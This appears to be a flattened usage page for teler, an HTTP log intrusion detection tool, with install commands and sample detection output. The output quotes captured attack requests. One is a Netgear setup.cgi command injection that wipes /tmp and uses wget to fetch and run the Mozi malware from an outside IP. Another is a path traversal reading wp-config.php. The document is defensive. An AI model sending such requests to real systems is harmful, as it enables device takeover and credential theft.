$ curl -sSfL 'https://ktbs.dev/get-teler.sh' | sh -s -- -b /usr/local/bin kitabisa/teler info checking GitHub for latest tag kitabisa/teler info found version: 0.0.4 for v0.0.4/linux/amd64 kitabisa/teler info installed /usr/local/bin/teler $ teler -v teler 0.0.4 $ git clone https://github.com/kitabisa/teler $ cd teler $ make build $ mv ./bin/teler /usr/local/bin $ docker pull kitabisa/teler $ export TELER_CONFIG="/root/teler.yaml" $ docker run -i --rm -e TELER_CONFIG=/root/teler.yaml kitabisa/teler-i apache.log $ cat apache.log | docker run -i --rm -e TELER_CONFIG=./teler.yaml kitabisa/teler rules: cache: true $ teler --rm-cache $ teler -i apache.log -c teler.yml -o threats.txt [Directory Bruteforce] /s?p=8f0f9570a1e1fb28f829a361441ab&t=bfd6c7c4&h=645cd72507b5af9d66d3425 [Directory Bruteforce] /wp-login.php [Bad Crawler] python-requests/2.22.0 [Bad Crawler] Java/1.8.0_131 [Bad Crawler] curl/7.29.0 [Common Web Attack: Detects specific directory and path traversal] /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://60.211.7.17:41606/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 $ cat threats.txt | grep -iv Crawler | wc [Common Web Attack: Detects basic directory traversal] /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php $ tail -f access.log | stdbuf -oL cut -d aq aq -f1 | uniq